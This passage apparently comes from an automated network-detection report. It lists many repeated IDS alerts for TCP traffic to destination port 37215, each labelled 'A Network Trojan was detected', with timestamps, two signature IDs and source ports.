          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223726
          SID:2829579
          Source Port:35806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163882
          SID:2829579
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166250
          SID:2829579
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165304
          SID:2835222
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168189
          SID:2829579
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986329
          SID:2829579
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678157
          SID:2829579
          Source Port:39510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252477
          SID:2829579
          Source Port:47098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205704
          SID:2829579
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660322
          SID:2829579
          Source Port:39970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637975
          SID:2835222
          Source Port:59834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272833
          SID:2835222
          Source Port:38140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818448
          SID:2829579
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986535
          SID:2835222
          Source Port:56766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034747
          SID:2829579
          Source Port:46678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223945
          SID:2829579
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865223
          SID:2829579
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292653
          SID:2835222
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571492
          SID:2835222
          Source Port:44406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027487
          SID:2829579
          Source Port:37442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079148
          SID:2829579
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643836
          SID:2835222
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082319
          SID:2835222
          Source Port:42616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990542
          SID:2835222
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418333
          SID:2835222
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2835222
          Source Port:51158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904589
          SID:2835222
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594095
          SID:2835222
          Source Port:50170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077236
          SID:2829579
          Source Port:43142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988916
          SID:2829579
          Source Port:38766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272059
          SID:2829579
          Source Port:59540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990525
          SID:2829579
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818585
          SID:2829579
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034250
          SID:2829579
          Source Port:53030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818226
          SID:2829579
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103084
          SID:2829579
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821261
          SID:2829579
          Source Port:58126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034163
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468013
          SID:2835222
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469688
          SID:2835222
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821435
          SID:2835222
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223528
          SID:2829579
          Source Port:53084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038545
          SID:2829579
          Source Port:42776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905310
          SID:2829579
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226846
          SID:2835222
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399706
          SID:2829579
          Source Port:58586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159521
          SID:2835222
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916854
          SID:2829579
          Source Port:34330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989936
          SID:2829579
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929366
          SID:2829579
          Source Port:60122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397305
          SID:2835222
          Source Port:53924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720551
          SID:2829579
          Source Port:58992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289547
          SID:2835222
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601059
          SID:2829579
          Source Port:36728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287274
          SID:2829579
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944185
          SID:2829579
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986907
          SID:2835222
          Source Port:38530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160210
          SID:2835222
          Source Port:36936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720137
          SID:2829579
          Source Port:46400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552774
          SID:2835222
          Source Port:59602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947871
          SID:2829579
          Source Port:48952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300967
          SID:2835222
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415554
          SID:2829579
          Source Port:41362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822124
          SID:2835222
          Source Port:33340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163984
          SID:2835222
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870667
          SID:2829579
          Source Port:59272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947563
          SID:2835222
          Source Port:54326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246082
          SID:2829579
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718431
          SID:2829579
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157365
          SID:2835222
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569535
          SID:2835222
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658862
          SID:2835222
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471543
          SID:2835222
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910583
          SID:2829579
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563117
          SID:2835222
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644403
          SID:2829579
          Source Port:52734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163967
          SID:2835222
          Source Port:37858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955776
          SID:2835222
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719609
          SID:2835222
          Source Port:42272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823462
          SID:2829579
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075738
          SID:2835222
          Source Port:39894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901999
          SID:2829579
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716161
          SID:2829579
          Source Port:38984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602190
          SID:2829579
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471130
          SID:2835222
          Source Port:56110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929371
          SID:2835222
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395893
          SID:2829579
          Source Port:49232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398090
          SID:2829579
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714970
          SID:2835222
          Source Port:44446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930383
          SID:2829579
          Source Port:51118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644058
          SID:2829579
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418847
          SID:2835222
          Source Port:57792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818139
          SID:2829579
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398620
          SID:2829579
          Source Port:34942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819122
          SID:2835222
          Source Port:53540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206314
          SID:2835222
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081852
          SID:2829579
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225818
          SID:2829579
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904654
          SID:2835222
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300873
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416079
          SID:2835222
          Source Port:52456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926880
          SID:2829579
          Source Port:33778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296793
          SID:2835222
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822784
          SID:2829579
          Source Port:44450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895901
          SID:2835222
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168642
          SID:2835222
          Source Port:33630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284857
          SID:2835222
          Source Port:41596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598592
          SID:2829579
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477507
          SID:2835222
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035281
          SID:2829579
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291323
          SID:2829579
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164505
          SID:2829579
          Source Port:46566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034811
          SID:2835222
          Source Port:35970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606748
          SID:2835222
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036066
          SID:2829579
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595167
          SID:2829579
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205932
          SID:2829579
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080608
          SID:2829579
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637811
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719547
          SID:2835222
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008634
          SID:2829579
          Source Port:51388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223270
          SID:2829579
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929186
          SID:2829579
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301172
          SID:2835222
          Source Port:46702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081030
          SID:2829579
          Source Port:51830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413962
          SID:2835222
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719489
          SID:2829579
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540018
          SID:2835222
          Source Port:34620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948836
          SID:2829579
          Source Port:34906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720328
          SID:2835222
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289553
          SID:2829579
          Source Port:59742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818747
          SID:2829579
          Source Port:33282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643346
          SID:2835222
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471111
          SID:2829579
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272354
          SID:2835222
          Source Port:57990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296831
          SID:2829579
          Source Port:43608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032892
          SID:2835222
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082907
          SID:2829579
          Source Port:50212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598206
          SID:2829579
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167380
          SID:2835222
          Source Port:58860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294106
          SID:2829579
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930279
          SID:2829579
          Source Port:33782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250874
          SID:2829579
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676013
          SID:2835222
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248783
          SID:2829579
          Source Port:60752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926382
          SID:2829579
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601820
          SID:2835222
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539367
          SID:2829579
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004090
          SID:2829579
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861059
          SID:2835222
          Source Port:42118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718301
          SID:2829579
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720307
          SID:2835222
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818782
          SID:2829579
          Source Port:52414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721100
          SID:2835222
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103076
          SID:2829579
          Source Port:41050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904495
          SID:2829579
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822308
          SID:2835222
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164980
          SID:2829579
          Source Port:42858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598219
          SID:2829579
          Source Port:36050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566306
          SID:2835222
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931452
          SID:2835222
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163923
          SID:2829579
          Source Port:37256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867236
          SID:2829579
          Source Port:36016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414935
          SID:2835222
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417505
          SID:2835222
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893052
          SID:2829579
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821689
          SID:2835222
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823067
          SID:2835222
          Source Port:47900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866214
          SID:2835222
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557333
          SID:2829579
          Source Port:47428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2835222
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079844
          SID:2835222
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592875
          SID:2835222
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915834
          SID:2835222
          Source Port:43850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467847
          SID:2829579
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164741
          SID:2835222
          Source Port:57686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719387
          SID:2829579
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552880
          SID:2835222
          Source Port:43786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274462
          SID:2835222
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472269
          SID:2829579
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823486
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892675
          SID:2835222
          Source Port:45542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416274
          SID:2835222
          Source Port:60712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206297
          SID:2829579
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478688
          SID:2829579
          Source Port:56456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900344
          SID:2835222
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299271
          SID:2835222
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901882
          SID:2835222
          Source Port:44066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035912
          SID:2829579
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720630
          SID:2835222
          Source Port:51494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243894
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035119
          SID:2829579
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036279
          SID:2835222
          Source Port:47920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167725
          SID:2829579
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559067
          SID:2829579
          Source Port:36180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296932
          SID:2829579
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946119
          SID:2829579
          Source Port:54090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
